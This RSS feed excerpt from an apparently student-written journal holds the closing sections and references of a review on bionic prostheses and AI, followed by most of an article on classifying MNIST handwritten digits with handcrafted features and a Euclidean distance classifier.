<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="264" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1024x264.jpeg" alt="" class="wp-image-4567" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1024x264.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-300x77.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-768x198.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1000x258.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-230x59.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-350x90.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-480x124.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 13: AI-driven closed loop in bionic devices: user intent → AI decoding/control → device actuation; multimodal sensory feedback closes the loop and adapts the user.</p>



<h4 class="wp-block-heading">B. Artificial Intelligence Integration</h4>



<p>AI is expected to play a central role in the next generation of bionics, from signal decoding to personalized adaptation.</p>



<ol class="wp-block-list">
<li>Adaptive Decoding: Deep neural networks can outperform traditional pattern recognition in EMG/EEG classification, particularly under noisy conditions. Reinforcement learning approaches demonstrate that systems can learn alongside users, adapting to signal drift and improving control fidelity without explicit recalibration [12].</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Personalization: AI enables prostheses to learn user-specific patterns, such as grip preferences, walking dynamics, or habitual tasks. Over time, the device can anticipate actions, moving toward predictive control rather than reactive operation.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>AI in Sensory Processing: In vision and hearing prostheses, AI can denoise input signals, highlight salient features, or adapt stimulation patterns for optimal perception. For example, a bionic eye might enhance contrast in low-light conditions or suppress irrelevant motion, mimicking biological attentional mechanisms.</li>
</ol>



<h4 class="wp-block-heading">C. Fully Implantable Energy Systems</h4>



<p>Energy supply remains a critical barrier. A major future direction is the development of fully implantable, autonomous power sources.</p>



<ol class="wp-block-list">
<li>Biofuel Cells: Glucose biofuel cells convert glucose and oxygen from bodily fluids into electricity. Early prototypes have powered pacemakers in animal models, suggesting feasibility for low-power implants.</li>



<li>Energy Harvesting: Thermoelectric generators can exploit the temperature gradient between body heat and ambient air, while piezoelectric harvesters generate power from motion. If scaled effectively, such technologies could eliminate the need for external charging.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Wireless Power Transfer: Mid-field and ultrasound-based wireless charging systems are being explored as alternatives to inductive coupling, enabling deeper implants to be recharged without bulky external coils.</li>
</ol>



<h4 class="wp-block-heading">D. Advanced Materials and Interfaces</h4>



<ul class="wp-block-list">
<li>Living Electrodes: Incorporating stem-cell–derived neurons into electrode arrays could reduce immune rejection and improve signal fidelity.</li>



<li>Self-Healing Polymers: Materials capable of repairing microcracks would extend device longevity under mechanical stress.</li>
</ul>



<p>TABLE VII: Emerging Research Trends and Future Directions in Bionics</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Domain</td><td>Emerging Innovation</td><td>Anticipated Impact(5-10 years)</td><td colspan="2">Example Studies</td></tr><tr><td>Limb Prostheses</td><td>Bidirectional,multimodal feedback</td><td>Naturalistic control andembodiment</td><td colspan="2">Ortiz-Catalan(2023) [1], Marasco(2021) [3]</td></tr><tr><td>Vision&nbsp;</td><td>Neuromorphic retinas</td><td>Color, wide-FoVartificial vision</td><td colspan="2">Long (2023) [10],Zhang (2023) [11]</td></tr><tr><td>Hearing</td><td>Optogenetic cochlearimplants</td><td>Finer frequencyresolution; musicperception</td><td colspan="2">Wilson (2017) [24]</td></tr><tr><td>Organ Bionics&nbsp;</td><td>Dual-hormone artificialpancreas</td><td>Near-physiologicalglycemic control</td><td colspan="2">Hovorka (2011) [23]</td></tr><tr><td>Energy&nbsp;</td><td>Glucose biofuel cells;wireless charging</td><td>Fully implantableautonomous power</td><td colspan="2">Nat. Commun.(2024) [18]</td></tr><tr><td>NeuralInterfaces</td><td>Wireless minimallyinvasive arrays</td><td>Home-use BCIs forparalysis</td><td colspan="2">Hochberg(2012) [14]</td></tr><tr><td></td><td></td><td></td><td></td><td></td></tr></tbody></table></figure>



<ul class="wp-block-list">
<li>Nanostructured Coatings: Surfaces engineered at the nanoscale can reduce bacterial adhesion (limiting infection risk) while promoting neural growth.</li>
</ul>



<h4 class="wp-block-heading">E. Ethical, Social, and Regulatory Horizons</h4>



<p>As devices become more integrated and powerful, ethical considerations will intensify.</p>



<ul class="wp-block-list">
<li>Cognitive Autonomy: Closed-loop BCIs blur the boundary between user intent and machine response, raising questions about responsibility and agency.</li>



<li>Human Enhancement vs. Therapy: While most bionics are designed for rehabilitation, the same technologies could be repurposed for augmentation, e.g., enhanced vision beyond the human spectrum.</li>



<li>Global Accessibility: Future efforts must prioritize equitable distribution, ensuring that breakthroughs benefit not only high-income nations but also the global disabled population.</li>
</ul>



<h4 class="wp-block-heading">F. A 5–10 Year Outlook</h4>



<p>Within the next decade, it is realistic to expect:</p>



<ul class="wp-block-list">
<li>Commercially available bidirectional prostheses with tactile and kinesthetic feedback.</li>
</ul>



<ul class="wp-block-list">
<li>Next-generation artificial pancreas systems incorporating dual-hormone control (insulin + glucagon) for near-normal glycemic regulation.</li>
</ul>



<ul class="wp-block-list">
<li>Retinal prostheses with color vision based on neuromorphic phototransistor arrays.</li>
</ul>



<ul class="wp-block-list">
<li>BCIs with wireless, minimally invasive arrays enabling everyday use in home environments.</li>
</ul>



<ul class="wp-block-list">
<li>Early adoption of autonomous power systems, reducing dependence on external charging.</li>
</ul>



<p>In parallel, advances in AI, regenerative medicine, and material science will continue to converge, driving bionics toward devices that are smaller, smarter, and more biologically integrated.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="891" height="956" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-11.jpeg" alt="" class="wp-image-4568" style="width:558px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-11.jpeg 891w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-280x300.jpeg 280w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-768x824.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-230x247.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-350x376.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-480x515.jpeg 480w" sizes="(max-width: 891px) 100vw, 891px" /></figure>



<p>Fig. 14: Convergence of disciplines: neuroscience, engineering, AI, and ethics. The overlap represents future bionics as seamless human–machine symbiosis.</p>



<h4 class="wp-block-heading">G. Toward Convergence of Disciplines</h4>



<p>The future of bionics will not be driven by any single technology but by the convergence of multiple fields. Neuroscientists, engineers, material scientists, ethicists, and clinicians must collaborate closely to translate prototypes into scalable, safe, and accessible devices. If this trajectory is sustained, the coming decades may witness the realization of functional, lifelong, fully integrated artificial organs and limbs, transforming rehabilitation and human–machine symbiosis.</p>



<h2 class="wp-block-heading">VIII. Conclusion</h2>



<p>Bionic devices have evolved from crude mechanical substitutes to sophisticated systems capable of bidirectional integration with the human nervous system. The landscape now includes neuromusculoskeletal limb prostheses, neuromorphic bionic eyes, cochlear implants, artificial pancreas systems, and experimental brain–computer interfaces. Across these categories, the central trend is clear: modern bionics aim not merely to restore function but to recreate the natural sensory–motor loop, thereby enhancing embodiment, autonomy, and quality of life.</p>



<p>Key technological enablers include biocompatible materials (e.g., titanium for osseointegration, organic semiconductors for neuromorphic sensors), advanced sensors and actuators (MEMS tactile arrays, series elastic actuators), and high-bandwidth neural interfaces (intraneural electrodes, hybrid nerve constructs).</p>



<p>Artificial intelligence and machine learning are now integral, allowing devices to adapt dynamically to user variability and environmental change.</p>



<p>Clinical studies demonstrate tangible benefits: improved dexterity, reduced phantom pain, restored sensory perception, and automated metabolic regulation. Yet significant challenges remain. Technical barriers such as signal instability and power supply, biological risks including immune response and infection, and ethical concerns over equity and neural data privacy all impede widespread adoption.</p>



<p>Looking forward, the field is poised for breakthroughs in closed-loop systems, AI-driven personalization, fully implantable energy solutions, and multimodal sensory feedback. Within the next decade, it is realistic to envision prostheses that feel like natural limbs, artificial organs that self-regulate without intervention, and BCIs that allow paralyzed individuals to regain independence in daily life.</p>



<p>Ultimately, the future of bionics lies in the convergence of disciplines—neuroscience, engineering, medicine, and ethics—to create devices that are not only technologically advanced but also safe, equitable, and meaningful for users. The vision of lifelong, seamlessly integrated artificial organs and limbs is no longer science fiction, but an achievable milestone within a generation.</p>



<h2 class="wp-block-heading">References</h2>



<ol class="wp-block-list">
<li>M. Ortiz-Catalan et al., “A highly integrated bionic hand with neural control and feedback for use in daily life,” Sci. Robot., vol. 8, no. 77, eadf7360, 2023.</li>



<li>S. Dosen, “Toward self-contained bidirectional bionic limbs,” Sci. Robot., vol. 8, no. 77, eadk6086, 2023.</li>



<li>S. Marasco et al., “Neurorobotic fusion of prosthetic touch, kinesthesia, and movement,” Sci. Robot., vol. 6, no. 59, eabf3368, 2021.</li>



<li>C. Pasluosta et al., “Bidirectional bionic limbs,” J. Neural Eng., vol. 19, no. 1, 013001, 2022.</li>



<li>U.S. Food and Drug Administration, “Argus II Retinal Prosthesis System—Summary of Safety and Effectiveness Data,” FDA, 2011.</li>



<li>T. R. Clites et al., “Design and clinical implementation of an open-source bionic leg,” Nat. Biomed. Eng., vol. 4, pp. 941–952, 2020.</li>



<li>Y. Cho et al., “Hybrid bionic nerve interface for application in bionic limbs,” Adv. Sci., vol. 10, no. 5, 2206859, 2023.</li>



<li>M. Ortiz-Catalan, “Thermally sentient bionic limbs,” Nat. Biomed. Eng., 2024.</li>



<li>Editorial, “Advances in clinical and prosthetic care,” Front. Rehabil. Sci., vol. 3, 2022.</li>



<li>Z. Long et al., “A neuromorphic bionic eye with filter-free color vision using hemispherical perovskite nanowire array retina,” Nat. Commun., vol. 14, 37581, 2023.</li>



<li>H. Zhang et al., “A neuromorphic bionic eye with broadband vision and biocompatibility using TIPS-pentacene phototransistor array retina,” Appl. Mater. Today, vol. 32, 2023.</li>



<li>H. R. Schone et al., “Biomimetic versus arbitrary motor control strategies for bionic hand skill learning,” Nat. Hum. Behav., vol. 8, pp. 1108–1123, 2024.</li>



<li>S. N. Flesher et al., “Restored tactile sensation improves neuroprosthetic arm control,” Sci. Transl. Med., vol. 13, no. 612, 2021.</li>



<li>L. R. Hochberg et al., “Reach and grasp by people with tetraplegia using a neurally controlled robotic arm,” Nature, vol. 485, pp. 372–375, 2012.</li>



<li>R. Brånemark et al., “Osseointegrated percutaneous prostheses for patients with limb loss,” Bone Joint J., vol. 101-B, pp. 55–63, 2019.</li>



<li>C. Pasluosta, P. Kiele, S. Micera et al., “The current state of bionic limbs from the surgeon’s viewpoint,” J. Neural Eng., vol. 19, no. 1, 2022.</li>



<li>“The future of bionic limbs,” Prosthet. Orthot. Int., vol. 45, no. 5, 2021.</li>



<li>“Clinical implementation of advanced bionic prostheses,” Nat. Commun., vol. 15, 2024.</li>



<li>H. R. Schone et al., “Should bionic limb control mimic the human body? Impact of control strategy on bionic hand skill learning,” bioRxiv preprint, 2023.</li>



<li>“Advances in prosthetic rehabilitation sciences,” Front. Rehabil. Sci., vol. 3, 2022.</li>



<li>World Health Organization, Global Report on Rehabilitation, Geneva, 2022.</li>



<li>P. C. Loizou, “Cochlear implants: Historical perspective and current applications,” IEEE Eng. Med. Biol. Mag., vol. 25, no. 5, pp. 40–46, 2006.</li>



<li>L. Hovorka, “Closed-loop insulin delivery: From bench to clinical practice,” Nat. Rev. Endocrinol., vol. 7, pp. 385–395, 2011.</li>



<li>B. C. Wilson, “The future of cochlear implants,” J. Assoc. Res. Otolaryngol., vol. 18, pp. 695–704, 2017.</li>



<li>UNESCO International Bioethics Committee, “Ethical issues of neurotechnology,” Policy Report, 2021.</li>
</ol>



<ol start="23" class="wp-block-list"></ol>



<ol start="24" class="wp-block-list"></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Vyomesh Vikram Singh</h5><p>Vyomesh Vikram Singh is a recent high school graduate with interests in computer science, robotics, and edge AI. His projects have included automation systems, gesture-controlled vehicles, unmanned aerial platforms, and a low-cost Raspberry Pi projector designed for rural classrooms to help underprivileged children connect to the internet. He has also worked on model optimisation for IoT devices and authored a review on human–computer interfaces, bionic limbs, and neuromorphic vision.</p><p>His research interests include robotics, human–machine interaction, and efficient AI deployment on embedded systems. Beyond academics, Vyomesh also served as a board member of Adlers, the Photography Club. Combining technology with art, he applied machine learning to make his filmography distinct and innovative, earning recognition at multiple competitions, including 3rd prize in an international geography documentary competition in Geofest International. Vyomesh has contributed to leadership and creative pursuits including serving as the head of his school’s Robotics Club for 3 years, guiding peers in building prototypes and organising seminar series by inviting respected external speakers. He is also an intermediate guitar player, and tries to make people around him happy by his talent.

</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/">Advanced Human–Computer Interfaces and AI : A Comprehensive Review</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</title>
		<link>https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance</link>
		
		<dc:creator><![CDATA[Austin Benedicto]]></dc:creator>
		<pubDate>Mon, 20 Oct 2025 21:39:47 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4409</guid>

					<description><![CDATA[<p>Austin Benedicto<br />
Nichols School</p>
<p>The post <a href="https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/">Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong>  Austin Benedicto<br><strong>Mentor</strong>: Dr. Rabih Younes<br><em>Nichols School<br></em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>The rapid growth of deep learning has overshadowed simpler, interpretable approaches to image classification. This study presents an alternative method for classifying handwritten digits using a custom feature extraction pipeline applied to the MNIST dataset. Rather than relying on convolutional neural networks, the classifier is built upon engineered features such as loop count, corner detection, symmetry score, bounding box dimensions, and writing direction. After normalization and feature weighting, a Euclidean distance classifier is used to compare new images to per-digit feature averages. The model achieves moderate accuracy and reveals detailed patterns of confusion between similar digits. This interpretable framework offers educational value, and may serve as a lightweight alternative in domains where transparency and explainability are prioritized.</p>



<h2 class="wp-block-heading">Introduction</h2>



<p>In recent years, machine learning and artificial intelligence have revolutionized image classification, with deep neural networks achieving state-of-the-art results across many datasets (Xie &amp; Tu, 2015). However, these models are often criticized for their lack of interpretability, requiring massive computational resources and opaque architectures that hinder trust in decision-making systems (Lundberg &amp; Lee, 2017; Fan et al., 2021). Particularly in educational settings or lightweight applications, simpler alternatives with explainable mechanisms are highly desirable. Interpretability is not just a technical challenge but a critical requirement for deploying AI responsibly, especially when end-users need to understand or contest the model&#8217;s decisions (Lipton, 2018).</p>



<p>This study explores a transparent, handcrafted pipeline for digit classification using the MNIST dataset. Instead of relying on pretrained convolutional networks, we develop a modular feature extraction system that emphasizes human-understandable visual traits. The extracted features are numerical descriptors such as bounding box dimensions, center of mass, symmetry, corner and intersection counts, and directional gradients derived from skeletonized images. These features are used in a Euclidean distance classifier that matches new digits to the closest mean feature vector per digit class. The objective is to demonstrate the utility and challenges of building a fully interpretable classification pipeline from scratch.</p>



<h2 class="wp-block-heading">Dataset and Preprocessing</h2>



<p>The experiment utilizes the well-established MNIST dataset, a collection of 70,000 grayscale images of handwritten digits ranging from 0 to 9. Each image is 28&#215;28 pixels in size and is paired with a corresponding digit label. For the purposes of this project, only the test set (10,000 samples) is used, with a configurable limit on how many samples per digit are extracted. Preprocessing begins by parsing the IDX-format image and label files into NumPy arrays, enabling efficient manipulation. The pixel values, originally ranging from 0 to 255, are binarized into black-and-white using a simple thresholding method. This step reduces noise and computational overhead for feature extraction algorithms, particularly those based on geometry and shape. Once binarized, each image is treated as a 2D grid where white pixels represent the strokes of the digit.</p>



<p>To prepare for classification, the dataset is stratified by digit class. A defined number of samples per digit (e.g., 100 images each for digits 0 through 9) are selected and then split into training and test sets. The training set comprises 80% of each digit&#8217;s samples, which are used to compute the mean feature vector for that class. The remaining 20% are reserved for evaluation. This consistent stratified sampling ensures that the model is exposed to a balanced and diverse set of handwriting styles while maintaining generalization in testing. This methodology facilitates accurate evaluation of the classifier&#8217;s performance using confusion matrices and accuracy metrics.</p>



<h2 class="wp-block-heading">Feature Extraction Pipeline</h2>



<p>Instead of relying on pixel-based convolutional layers or learned representations, this study employs a handcrafted feature extraction pipeline that emphasizes interpretability and simplicity. Each image undergoes a series of geometric and spatial analyses to extract meaningful numerical features. The first feature is the dark pixel count, which reflects the number of active (white) pixels in the binary image and serves as a proxy for stroke density. The center of mass is then calculated by averaging the coordinates of all white pixels, providing insight into digit placement and skew. Bounding box dimensions are computed by identifying the outermost white pixels, then determining the height and width of the smallest rectangle that encloses the digit: useful for distinguishing tall digits like 1 from wide digits like 8 or 0.</p>



<p>Several topological features are also extracted. Loop count is determined using OpenCV’s findContours function, which detects enclosed regions in the digit’s shape. This is especially informative for digits such as 6, 8, and 9, which may contain one or more loops. The corner count uses Harris corner detection applied to the skeletonized image, which minimizes redundant stroke thickness and enhances precision. Intersection count is calculated by analyzing the number of skeletonized pixels that have more than two white neighbors in an 8-connectivity pattern, which indicates points where strokes cross or branch. Both features provide structural detail critical for distinguishing between digits with similar silhouettes, such as 4 and 9.</p>



<p>To further enhance the feature set, a symmetry score is calculated by reflecting the image horizontally and vertically and measuring the pixel overlap between the mirrored and original images. This allows for quantification of both vertical and horizontal symmetry, key traits in digits like 0 and 8. Finally, a directional feature is derived by skeletonizing the digit and computing the gradient flow, which is then subjected to a Fourier transform to isolate the dominant direction and its magnitude. This writing direction analysis is further divided across image quadrants, enabling localized directionality insights. Together, these features provide a compact yet rich representation of each digit, making the classification process interpretable and explainable.</p>



<h2 class="wp-block-heading">Classification Strategy</h2>



<p>Following the extraction of handcrafted features from the binarized and skeletonized images, classification is performed using a simple, interpretable method based on Euclidean distance to class averages. This method was chosen over more complex machine learning models to maintain full transparency in decision-making and provide clear insight into how features influence predictions. The pipeline first computes the average feature vector for each digit class (0 through 9) using the 80% training portion of the dataset. These averages represent the typical geometric and topological characteristics of each digit, such as mean loop count for eights or average horizontal symmetry for zeros.</p>



<p>Each feature is then normalized on a 0 to 1 scale across the dataset to prevent features with larger ranges (e.g., dark pixel count) from disproportionately affecting the Euclidean distance computation. Once normalization is complete, the classifier measures the straight-line (L2) distance between each test image’s feature vector and the average vector for each digit class. The digit whose class average yields the smallest distance is assigned as the predicted label for that image.</p>



<p>To enhance flexibility and allow for fine-tuning of the classification process, the system includes support for feature weighting. Each feature can be scaled by a custom weight during distance calculation, effectively increasing or decreasing its influence on the final prediction. This allows for experimentation with different feature importance values, guided by confusion matrices and performance trends. For instance, if corner count is found to be highly discriminative between certain digits (like 4 and 7), its weight can be increased to reflect its higher utility.</p>



<p>The classifier outputs a confusion matrix that visualizes the true versus predicted labels across all classes, allowing for targeted diagnosis of where misclassifications occur. The overall accuracy is also computed as the percentage of correct predictions on the test set, providing a concise summary of classifier performance. This baseline approach is not only computationally inexpensive and highly interpretable but also lays the groundwork for more advanced ensemble techniques or data-driven weight optimization in future iterations of the project.</p>



<h2 class="wp-block-heading">Feature Extraction</h2>



<p>Feature extraction is the core component of this project, as it forms the foundation upon which classification is based. Instead of using deep learning to automatically learn features from the data, this project focuses on manually engineered features: interpretable numerical attributes that describe various geometric and visual properties of handwritten digits. These features are designed to help distinguish between digit classes by capturing unique patterns, shapes, and structures in the binary images of the digits (Nguyen &amp; Bai, 2020).</p>



<p>The feature extraction pipeline begins by reading grayscale MNIST digit images, which are normalized and binarized so that white pixels (indicating parts of the digit) are treated as foreground and black pixels as background. From there, a series of handcrafted features are computed. One of the most basic yet important features is the total number of white (foreground) pixels, which provides a rough measure of the digit’s thickness or density.</p>



<p>Another key feature is the bounding box area, which captures the size of the smallest rectangle that contains all white pixels of the digit. This is complemented by the center of mass, a two-dimensional coordinate (x, y) that indicates the average location of the white pixels. Together, these features provide spatial information about the digit&#8217;s spread and balance.</p>



<p>Corners are detected using a skeletonized version of the digit, followed by the Harris corner detection algorithm. This isolates sharp changes in pixel direction and curvature, giving insight into how angular the digit is. A digit like “4” or “7” tends to have many corners, while “0” or “8” might have fewer. In contrast, intersections are defined as pixels in the skeleton with three or more white neighbors: these typically appear at junctions where strokes branch or cross, such as in the middle of a “4” or “8”.</p>



<p>Loop detection is another critical feature. Loops are identified by performing a flood fill on the background and counting the number of enclosed white regions. This helps distinguish looped digits like “8” or “6” from non-looped ones like “1” or “7”.</p>



<p>Symmetry is calculated in two directions: horizontal and vertical. For horizontal symmetry, the top half of the digit is compared to the flipped bottom half, pixel by pixel. A similar process is used for vertical symmetry. The results are stored as decimal values between 0 and 1, where 1 indicates perfect symmetry. Digits like “8” are highly symmetric, while “5” is less so.</p>



<p>One of the more advanced features is writing direction, which analyzes the dominant flow of pen strokes in the digit. This is estimated by skeletonizing the digit and calculating gradient vectors between connected white pixels. The directions are summarized using angular histograms and averaged over four image quadrants to better capture local directional trends. The result includes both magnitude (the strength of directional flow) and angle (the orientation), which help differentiate digits based on how they are drawn: for example, a “2” may show strong rightward curvature, while a “7” may show sharp vertical and diagonal transitions.</p>



<p>Finally, quarter-based features are also computed by dividing each image into four equal parts. For each quadrant, features like pixel density, average stroke width, and gradient flow are independently measured. This adds a layer of localized spatial analysis and can be particularly helpful when digits share global features but differ in their layout, such as “9” vs “4”.</p>



<p>In summary, the feature extraction process converts raw MNIST image data into a structured vector of interpretable numeric features that describe the digit&#8217;s shape, structure, and writing dynamics. These features are exported into a CSV file for use in the classification stage, enabling an interpretable, modular approach to handwritten digit recognition.</p>



<h2 class="wp-block-heading">Classification Pipeline</h2>



<p>Following feature extraction, the digit classification was performed using a distance-based approach. Rather than leveraging external machine learning libraries, a custom K-Nearest Neighbors (KNN)-style classifier was implemented from scratch. The classifier calculates the Euclidean distance between each testing image’s feature vector and the average feature vector of each digit class (0–9) computed from the training set.</p>



<p>Before computing distances, feature values were normalized to a [0,1] range using min-max scaling to avoid bias due to differing numeric scales. Additionally, the system allows for feature weighting, meaning that more important features (e.g., symmetry or loop count) can be assigned higher influence during classification. This modular design supports experimentation with different weighting schemes to optimize accuracy.</p>



<p>The model evaluates its predictions using a confusion matrix, precision metrics, and accuracy scores, enabling quantitative comparison of different feature sets and weighting strategies. Errors are visually inspected to guide iterative refinement of the feature extraction and classification logic.</p>



<h2 class="wp-block-heading">Dataset and Experimental Setup</h2>



<p>For this study, we utilized the MNIST dataset, a well-known benchmark for handwritten digit recognition. The full dataset consists of 70,000 labeled grayscale images of handwritten digits (0–9), each of size 28×28 pixels. Of these, 60,000 images are used for training and 10,000 for testing. However, in our experiment, we implemented a custom CSV-based approach using a limited subset of the MNIST data. Specifically, we processed and extracted features from a fixed number of samples per digit to maintain class balance and control computational complexity.</p>



<p>The system was designed in two main phases: feature extraction and classification. In the feature extraction phase, each image was transformed into a row in a CSV file, where each column represented a manually engineered feature such as pixel count, loop count, symmetry, bounding box, intersection count, etc. In total, over 20 distinct features were extracted and used in the classification phase.</p>



<p>The classification phase was implemented using a custom Euclidean distance classifier. For each digit class (0–9), we computed the average feature vector across the training samples. When a new test image was presented, its features were compared against each of the class averages using Euclidean distance, and the closest class was chosen as the prediction.</p>



<p>Additionally, we introduced feature weighting, allowing specific features to have more or less influence during classification based on their discriminative power. The classification results were tracked and evaluated using accuracy metrics and confusion matrices.</p>



<h2 class="wp-block-heading">Accuracy and Confusion Matrix</h2>



<p>The performance of the classifier was evaluated using a confusion matrix, which visually represents the number of correct and incorrect predictions for each digit. This matrix enabled us to quickly identify which digits were most frequently misclassified and which were most accurately predicted.</p>



<p>The initial model, without any feature weighting or tuning, achieved a moderate classification accuracy, with particularly strong performance on digits like “0” and “1,” which have distinct visual structures. Digits such as “5” and “3” were more commonly confused with each other due to their visual similarity, particularly in cursive or stylized handwriting.</p>



<p>After iteratively tuning the feature weights, we observed a notable improvement in classification performance, especially in reducing confusion between closely related digits. For example, giving more weight to loop count, intersections, and writing direction significantly helped in distinguishing digits like “6,” “8,” and “9.”</p>



<p>At its best configuration, the system reached an overall accuracy of 50.81, with some digits like “1,” “0,” and “8” achieving near-perfect classification. The confusion matrix clearly reflected the impact of feature weighting, with off-diagonal errors shrinking in many digit classes.</p>



<p>To assess which features contributed most effectively to accurate digit classification, a series of weight tuning experiments and feature ablation tests were conducted. These experiments involved systematically adjusting the importance (weight) of individual features during the classification process and observing the resulting changes in accuracy. This approach allowed us to isolate the features with the greatest impact on distinguishing between visually similar digits.</p>



<p>One of the most consistently useful features was pixel count, which reflects the total number of non-background pixels in the digit image. This feature helped differentiate digits with dense strokes, like “8,” from those with minimal writing, such as “1.” Similarly, loop count proved to be highly informative, especially for identifying digits like “8,” which contains two loops, versus digits such as “0,” “6,” or “9,” which have one loop, and digits like “1” or “7,” which have none.</p>



<p>The corner count and intersection count, both derived from the skeletonized version of the digit, played a key role in identifying digits that involve sharp turns or complex branch-like structures. Digits such as “4” and “8” exhibited higher intersection counts due to multiple connecting lines, while digits like “1” and “7” had noticeably fewer corners. However, corner detection was found to be sensitive to image noise and line thickness, and improvements were made by fine-tuning the skeletonization algorithm (Siddiqi &amp; Pizer, 2008).</p>



<p>Another valuable set of features came from analyzing symmetry. Horizontal and vertical symmetry scores helped to recognize digits with more balanced structures, such as “0,” “3,” and “8.” In contrast, digits like “5” and “2” exhibited more asymmetry, which aided in distinguishing them from others. Symmetry-based features were particularly helpful when pixel count or loops were not sufficient on their own.</p>



<p>Finally, one of the most advanced features used was the writing direction, computed from gradient vectors and angular motion across the digit’s skeleton. This feature helped capture the natural drawing flow of digits. For example, “2” typically starts with a curve that swings from the top left to the bottom right, while “5” often features a left-facing arc followed by a vertical drop. By dividing the image into quadrants and calculating directional vectors in each section, we were able to capture both global and local movement trends that further improved digit differentiation.</p>



<p>Overall, the combination of these features, both geometric and dynamic, provided a diverse and interpretable representation of handwritten digits. When these features were strategically weighted, they significantly improved the system’s ability to correctly classify even the most visually ambiguous samples.</p>



<h2 class="wp-block-heading">Visualization and Debugging</h2>



<p>Visualization tools played a crucial role in understanding model behavior. For each test sample, the system could plot the digit image, highlight detected corners, intersections, center of mass, bounding box, and even draw gradient arrows representing writing direction. These visuals helped validate that the feature extractor was working correctly and guided the adjustment of skeletonization, thresholding, and corner detection parameters (Siddiqi &amp; Pizer, 2008).</p>



<p>Skeletonization outputs, in particular, revealed occasional anomalies, such as overly thick or broken lines due to imperfect thresholding. These were later corrected through pre-processing steps and adaptive thinning (Siddiqi &amp; Pizer, 2008).</p>



<h2 class="wp-block-heading">Summary of Results</h2>



<p>Overall, the experimental results demonstrated that an interpretable, feature-based classifier can achieve reasonable performance on a complex task like digit recognition. While not competitive with modern convolutional neural networks (CNNs), this approach provides clear insights into how features contribute to classification. The system’s modularity also makes it easy to extend, optimize, and debug.</p>



<p>The key takeaway is that careful feature engineering and visualization can go a long way in building effective and explainable machine learning models: even for tasks typically reserved for deep learning (Nguyen &amp; Bai, 2020).</p>



<h2 class="wp-block-heading">Strengths of the Approach</h2>



<p>One of the major strengths of this handwritten digit classification system is the interpretability of the features used. Unlike black-box models such as neural networks, which can achieve high accuracy but offer little transparency, this approach relies on intuitive and human-understandable features, such as corner counts, pixel density, symmetry, and writing direction. These features provide not only a basis for classification but also a valuable window into the structure and characteristics of handwritten digits. This makes the model especially useful for educational purposes, explainable AI research, and deployment in systems where traceability of decisions is important.</p>



<p>Additionally, the design emphasizes customization and modular testing. Because each feature is extracted individually and can be visualized, the model allows for fine-grained analysis of each image. Visualization tools, such as skeleton overlays, direction arrows, and bounding boxes, enhance interpretability and assist in identifying both successful and problematic classifications. Moreover, the implementation of feature weighting allows for dynamic tuning of the classifier to prioritize certain distinguishing characteristics for specific digits, significantly improving the robustness of the model.</p>



<h2 class="wp-block-heading">Limitations</h2>



<p>Despite these strengths, the system also has notable limitations. First, feature-based classification is inherently less flexible than deep learning models. While convolutional neural networks can learn thousands of nuanced features from training data, this system relies on a fixed set of manually engineered features. As a result, it may struggle to adapt to unusual handwriting styles or generalize to out-of-distribution samples (Nguyen &amp; Bai, 2020).</p>



